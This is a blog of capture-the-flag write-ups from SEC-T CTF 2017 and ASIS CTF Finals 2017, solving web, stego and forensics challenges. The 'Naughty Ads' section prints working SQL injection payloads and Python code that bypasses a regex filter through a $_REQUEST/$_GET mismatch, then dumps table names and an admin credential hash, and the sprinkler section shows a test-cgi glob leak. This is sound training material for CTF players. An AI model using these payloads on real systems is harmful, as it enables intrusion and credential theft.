SEC-T CTF 2017 – Naughty Ads

Joining 2amResearch for the SEC-T CTF 2017 challenges, here is a post from @akrotos solving the Naughty Ads web challenge.

Top of the challenge rabbit hole

Let’s head on over to the challenge page and load up Burp Suite. A peek at the page’s HTML shows that it contains an image with clickable regions (wow, image maps were so 1995) linking to all the *ahem* ads, plus a link to an admin page. Clicking on an ad takes you to a simple page with a suggestive description and a phone number. Unfortunately, the admin page doesn’t use the Equifax default username and password of admin:admin. At this point it’s pretty obvious that we need to figure out a way of getting Agent Gill’s phone number into an ad, probably by using the admin page.

Checking the robots.txt gives us the following:

User-agent: *
Disallow: /admin
Disallow: /*.phps

The admin page we already know about, but the *.phps path could be useful: a .phps file is PHP source served as syntax-highlighted text rather than executed. admin.phps gives a 404, but index.phps is available, so let’s take a look.

<?php
require_once 'lib.php';
header('X-XSS-Protection: 0');
$cols = array(
"e8c4-437b-9476",
"849e-416e-acf7",
"7f9d-470f-8698",
"c8bb-4695-93f7",
"5fbc-4729-8821",
"3ad3-46c3-b975",
"f44f-4cc9-a5e0",
"0c3f-42c8-a0ae"
);

if(isset($_REQUEST['id'])){
if(preg_match("/'(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){
die("Attack detected!!!");
}
$ad = get_ad($_GET['id']);
?>
<HTML>
<HEAD>
<TITLE>NAUGHTY ADS ©1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
<?php echo $ad['description'] ?><br />
<a href="/">Home</a>
</CENTER>
</BODY>
</HTML>
<?php
die;
}

?>
<HTML>
<HEAD>
<TITLE>NAUGHTY ADS ©1994</TITLE>
</HEAD>
<BODY BGCOLOR="WHITE">
<CENTER>
<img class="ads" src="middle.png" width="800" height="600" usemap="#planetmap">
<map name="planetmap">
<area shape="rect" coords="287,93,523,261" href="?id=<?php echo array_pop($cols); ?>" alt="BDSM hookup">
<area shape="rect" coords="542,93,774,261" href="?id=<?php echo array_pop($cols); ?>" alt="Fat fetish">

<area shape="rect" coords="34,282,269,449" href="?id=<?php echo array_pop($cols); ?>" alt="Dirty mistress">
<area shape="rect" coords="292,282,521,449" href="?id=<?php echo array_pop($cols); ?>" alt="Femdom one night stand">
<area shape="rect" coords="545,282,777,449" href="?id=<?php echo array_pop($cols); ?>" alt="Waterboarding extasy">

<area shape="rect" coords="33,468,266,595" href="?id=<?php echo array_pop($cols); ?>" alt="Kinky nightmare">
<area shape="rect" coords="277,456,534,598" href="?id=<?php echo array_pop($cols); ?>" alt="Food fetish">
<area shape="rect" coords="547,466,780,599" href="?id=<?php echo array_pop($cols); ?>" alt="Whip experience">

<area shape="rect" coords="595,23,619,57" href="/admin" alt="Admin">
</map>
</CENTER>
</BODY>
</HTML>

Combing through the source turns up an interesting bit of PHP with a regex meant to filter SQL injection attacks. Note carefully which variable is filtered and which one is handed to the query.

if(isset($_REQUEST['id'])){
    if(preg_match("/'(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){
        die("Attack detected!!!");
    }
    $ad = get_ad($_GET['id']);

This bit had us stumped for a while, but an old hardcore PHP developer pointed out that there is a subtle difference between $_REQUEST[] and $_GET[]. Thank you, Philip Fulcher. With PHP’s default request_order, $_REQUEST is populated from GET first and then POST, so a POST parameter overrides a GET parameter of the same name, while $_GET only ever sees the URL. We can exploit this difference to bypass the regex by changing the HTTP GET to a POST and sending two ‘id’ parameters: a harmless one in the request body (which is what $_REQUEST, and therefore the filter, sees) and the injection in the URL (which is what $_GET, and therefore get_ad(), receives). Example request here
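To make the $_REQUEST/$_GET split concrete, here is an added example (written for this page, not code from the challenge or the original writeup) that models PHP’s default superglobal precedence in Python, runs the challenge’s own regex against the variable the filter reads, and shows the value that would still reach get_ad(). A hardened handler that filters and uses the same variable is included for contrast. The host and path in build_bypass_request() are placeholders, since the writeup does not give them.

```python
import re
from urllib.parse import parse_qs, quote

# The challenge's own filter, translated from the PHP preg_match pattern
# character-for-character (the syntax is the same in PCRE and Python's re).
SQLI_FILTER = re.compile(r"'(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)", re.IGNORECASE)


def php_superglobals(query_string, body):
    """Model $_GET, $_POST and $_REQUEST for one request.

    With PHP's default request_order ("GP"), $_REQUEST is filled from GET
    first and POST second, so a POST value overrides a GET value of the
    same name. $_GET only ever sees the URL. Last value wins for repeated
    keys, as in PHP.
    """
    get = {k: v[-1] for k, v in parse_qs(query_string, keep_blank_values=True).items()}
    post = {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}
    request = dict(get)
    request.update(post)
    return get, post, request


def vulnerable_handler(query_string, body):
    """Mirror of index.php: filter $_REQUEST['id'], then query with $_GET['id'].

    Returns ("no_id", None), ("blocked", None) or ("query", value), where
    value is what get_ad() would splice into the SQL.
    """
    get, _, request = php_superglobals(query_string, body)
    if "id" not in request:
        return ("no_id", None)
    if SQLI_FILTER.search(request["id"]):
        return ("blocked", None)          # die("Attack detected!!!")
    return ("query", get.get("id"))       # get_ad($_GET['id'])


def fixed_handler(query_string, body):
    """Same flow, but the filter inspects the very variable the query uses."""
    get, _, _ = php_superglobals(query_string, body)
    if "id" not in get:
        return ("no_id", None)
    if SQLI_FILTER.search(get["id"]):
        return ("blocked", None)
    return ("query", get["id"])


def build_bypass_request(payload, host="challenge.example", path="/"):
    """Raw HTTP request for the bypass: the injection goes in the URL (read by
    $_GET), a harmless id goes in the body (read by $_REQUEST, hence the filter).
    host and path are placeholders; the writeup does not give them."""
    body = "id=0000-0000-0000"
    return (
        f"POST {path}?id={quote(payload)} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


if __name__ == "__main__":
    payload = "0000-0000-0000' UNION SELECT USER() #"
    qs = "id=" + quote(payload)
    print(vulnerable_handler(qs, ""))                   # ('blocked', None)
    print(vulnerable_handler(qs, "id=0000-0000-0000"))  # ('query', "0000-0000-0000' UNION SELECT USER() #")
    print(fixed_handler(qs, "id=0000-0000-0000"))       # ('blocked', None)
    print(build_bypass_request(payload))
```

The lesson generalises beyond this challenge: any time input validation and input use read from different sources (query vs. body, header vs. parameter, raw vs. decoded), an attacker can satisfy the check with one copy and reach the sink with the other.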

The application expects exactly one row back from the query, otherwise it throws an HTTP 500. Since the id 0000-0000-0000 matches no ad, a UNION SELECT with a single column supplies that one row, and its value is echoed into the page as the description. Setting the malicious id parameter to the string below shows how this works.

id=0000-0000-0000' UNION SELECT USER() %23

‘%23’ is ‘#’ URL-encoded; the # starts a MySQL comment and swallows whatever the original query appends after our injected id. The encoding is needed or else the server returns a 400. Not sure why, but let’s just roll with it.

With a working union-based SQL injection (not blind: the result is reflected straight into the page) we can probe the database for more info. Guessing the backend is a MySQL database, because PHP devs don’t know how to use anything else, we can use GROUP_CONCAT() to collapse the list of tables into a single comma-separated value (mind group_concat_max_len, 1024 bytes by default, which silently truncates long lists). The query below returns every table visible to the database user, system tables included; once we filter out the information_schema entries by eye, two user tables remain: ads and login.

id=0000-0000-0000' UNION SELECT GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.tables %23

Concatenating all the columns of the login table in a single select gives us a very nice reward.

id=0000-0000-0000' UNION SELECT CONCAT(id, ',', username,',', password) FROM login %23

1,webmasterofdoom3755,5ebe2294ecd0e0f08eab7690d2a6ee69


5ebe2294ecd0e0f08eab7690d2a6ee69 is the MD5 hash of the string ‘secret’. Plugging the username and password into the login prompt gets us into the admin page, where we see a simple form with a phone number, a description, and an image to upload. Submitting the form with the phone number from the start of the challenge gives us the flag.

Flag: SECT{~tr4nsv3stiT3s_w3lc0me_t00~}

SEC-T CTF 2017 – Report

Report was a nice little challenge: we were presented with a PDF file that Mr. Belford had written up for the FBI about Joey’s hack of the Gibson. The challenge alluded to Mr. Belford hiding something within the file. An initial look at Report.pdf turned up nothing of note, except some troll flags 😀

So we took this challenge to the command line. Our first pass at the file, running strings and other useful commands, turned up nothing. Giving our tired eyes a break, we came back to Report.pdf later in the CTF timeframe. Running strings again, we started to notice a pattern, specifically within object 146:

We noticed that the last two characters of the second column of object 146 were all hex digits, and that they decoded to printable ASCII. One thing to note is that the string was stored in reverse, so we had to start from the bottom and make our way to the top.

We tried our hand at cutting this column out with some command-line kung fu that failed… a little bit, but when the output came back we were hopeful, having caught a glimpse of the flag 😀

So we decided to just take the string of hex and use xxd -r -p to convert the hex to ASCII.
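The extraction recipe above (second column, last two characters, bottom-up, hex-decode) as an added example, not part of the original writeup. The real object 146 only exists as a screenshot, so the block builds a constructed stand-in with the same layout and decodes it; the encoder is purely for producing that sample.

```python
import binascii
import string


def recover_hidden_string(object_lines):
    """Apply the writeup's recipe to the text of a PDF object: take the last two
    characters of the second whitespace-separated column on every line, read the
    pairs bottom-up, and decode the hex.

    Lines with fewer than two columns are skipped. A pair that is not hex raises,
    so picking the wrong column fails loudly instead of producing garbage.
    """
    pairs = []
    for line in object_lines:
        cols = line.split()
        if len(cols) < 2:
            continue
        pair = cols[1][-2:]
        if len(pair) != 2 or any(c not in string.hexdigits for c in pair):
            raise ValueError(f"non-hex pair {pair!r} in line {line!r}")
        pairs.append(pair)
    pairs.reverse()                       # the hidden string is stored in reverse
    return binascii.unhexlify("".join(pairs)).decode("ascii")


def hide_string_in_column(message):
    """Build a constructed stand-in for object 146 (the real one is only shown as a
    screenshot): one line per byte, bytes in reverse order, each byte as the low
    two hex digits of a four-digit second column."""
    lines = []
    for i, b in enumerate(reversed(message.encode("ascii"))):
        filler = (i * 37) % 256           # arbitrary high byte so the column looks like data
        lines.append(f"{i} {filler:02x}{b:02x} 0")
    return lines


if __name__ == "__main__":
    # Constructed sample, not the challenge file: pairs 21, 69, 48 read bottom-up.
    sample = ["0 2a21 0", "1 3069 0", "2 1148 0"]
    print(recover_hidden_string(sample))  # Hi!
    print(recover_hidden_string(hide_string_in_column("SECT{N07_N1C3_T0_BR3Ak_LUCY}")))
```

The strict hex check is the practical bit: when you are guessing which column carries the payload, a decoder that refuses non-hex input tells you immediately that you cut the wrong field, instead of handing you a plausible-looking but wrong byte string.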

Flag: SECT{N07_N1C3_T0_BR3Ak_LUCY}

SEC-T CTF 2017 – Acid Burn

Acid Burn was a fun challenge, and given the hint within the challenge, “hiding something in her background image”, we figured it was a stego challenge 🙂

Upon downloading the file we were presented with chall.webp. We have to admit we were not too familiar with the .webp file type, so we did a little research first.

Given that it was a stego challenge we ran the basics on the file (strings, pnginfo, binwalk) and even loaded the image into StegSolve, but nothing stood out as unusual or flag-like. So we converted the file to PNG, and for this task we used XnConvert, which worked really well.

Once we had the file converted we re-ran our commands and loaded the PNG back into StegSolve; scrolling through the different bit planes, the image began to reveal something interesting:

We knew we had found the flag from the leading “SECT{” at the top of the image; to get a clearer view we tweaked StegSolve a little more until we could make out the whole flag.

Overall this was a great stego challenge 😀

Flag: SECT{I_LOVE_CRASH_OVERFLOW_BUT_I_CAN_NOT_TELL_HIM_HOW_I_FEEL_ABOUT_HIM}

SEC-T CTF 2017 – Sprinkler System

Given the challenge we browsed over to http://sprinklers.alieni.se/ and were presented with an old administrator interface for the sprinkler system.

We took a look at the usual avenues when presented with a web challenge and browsed over to /robots.txt

Noticing the /cgi-bin/test-cgi entry, we immediately browsed to it and discovered a test script report page:

Adding an extra / after test-cgi showed us the web root, “PATH_TRANSLATED = /var/www/html/index.html”. With this clue we knew there were files and directories waiting to be found.

A bit of searching turned up two interesting links, one on insecure.org and the other about CVE-1999-0070: the classic test-cgi script echoes QUERY_STRING without quoting it, so the shell performs filename globbing on whatever we put in the query, and a bare * expands to the names of the files in cgi-bin. With this in mind we tested different query strings against the web server until http://sprinklers.alieni.se/cgi-bin/test-cgi?* gave some interesting results and the feeling we were going to need an umbrella 🙂
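The glob expansion behind CVE-1999-0070, as an added example written for this page (not the challenge’s script): the vulnerable echo line and its quoted counterpart are run under /bin/sh inside a throwaway directory whose file names are constructed to match what the writeup saw, so you can watch * turn into a directory listing in one case and stay a literal * in the other.

```python
import os
import shutil
import subprocess
import tempfile

# The relevant line of the classic test-cgi script (CVE-1999-0070): QUERY_STRING is
# expanded unquoted, so the shell applies filename globbing to the attacker's input.
UNQUOTED_ECHO = "echo QUERY_STRING = $QUERY_STRING"
# The safe form: double quotes suppress globbing and word splitting.
QUOTED_ECHO = 'echo QUERY_STRING = "$QUERY_STRING"'


def run_echo_line(script, query_string, cgi_dir):
    """Run one echo line the way a CGI would see it: inside cgi-bin, with the raw
    query string in the environment, under the system's POSIX sh."""
    sh = shutil.which("sh") or "/bin/sh"
    env = {"PATH": "/usr/bin:/bin", "QUERY_STRING": query_string}
    result = subprocess.run([sh, "-c", script], cwd=cgi_dir, env=env,
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


def compare_handling(query_string, filenames):
    """Create a throwaway cgi-bin holding the given (constructed) file names and
    return (leaked, safe): what the vulnerable and the fixed echo lines print."""
    with tempfile.TemporaryDirectory() as cgi_dir:
        for name in filenames:
            open(os.path.join(cgi_dir, name), "w").close()
        leaked = run_echo_line(UNQUOTED_ECHO, query_string, cgi_dir)
        safe = run_echo_line(QUOTED_ECHO, query_string, cgi_dir)
    return leaked, safe


if __name__ == "__main__":
    # Constructed directory contents; the names match the listing in the writeup.
    leaked, safe = compare_handling("*", ["enable_sprinkler_system", "test-cgi"])
    print(leaked)  # QUERY_STRING = enable_sprinkler_system test-cgi
    print(safe)    # QUERY_STRING = *
```

Narrower globs work too (e* lists only names starting with e), which is how the same bug can be used to probe for specific scripts without dumping the whole directory.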

We now see “QUERY_STRING = enable_sprinkler_system test-cgi”, the two files in cgi-bin. Browsing to http://sprinklers.alieni.se/cgi-bin/enable_sprinkler_system gave us rewarding results:

 

Flag: SECT{-p00l_On_t3h_r00f_must_h@v3_A_l3ak!-}

SEC-T CTF 2017 – Handle

First off, thanks to the whole SEC-T team; we really enjoyed the Hackers 1995 theme. HACK THE PLANET! As with most CTFs there was a freebie: Joey needed a handle, easily found in the IRC channel topic.

Browsing to the IRC we get the flag:

 

Flag: SECT{CRASH_OVERR1D3}

ASIS CTF Finals 2017 – Dig Dug

In this post we wanted to share our solution to the ASIS CTF Finals 2017 Dig Dug challenge. Below is the challenge we were faced with:

Seeing that this was a web challenge we simply clicked on the link and were immediately redirected to an obscure web page.

Can you dig it?!

Noticing the less than obvious clue on the page, and being familiar with the dig command from our analyst days, we went straight to the terminal, ran dig against dibx.asisctf.com and then a reverse lookup (dig -x) on the returned IP address.

The reverse lookup uncovered the hostname airplane.asisctf.com. Browsing to that site we were once again faced with an obscure webpage, this time with some interesting hints to take things offline and “Enable Airplane Mode” 😀

We took a quick look at the page source and at the linked files hosted on the site and came across js.js; viewing this file we noticed a very large variable holding hex data.

Taking the website admin’s advice to go offline, we used wget to recursively download all the files from the website.

Once we had all the files downloaded, and with a hunch that js.js had something interesting for us, we focused our efforts on decoding that variable and created a simple page to render the result.

Finally we had our simple HTML page built around the long variable from js.js, but once again we got a very strange result.

 

We figured that at this point the trolling was about over, and since this was a web warmup we decided to search for “ASIS” throughout the page. The results of the search were rewarding 😀

We ended up finding the flag within the page.  “ASIS{_just_Go_Offline_When_you_want_to_be_creative_!}”

Overall the ASIS CTF was a blast and we hope to join many more!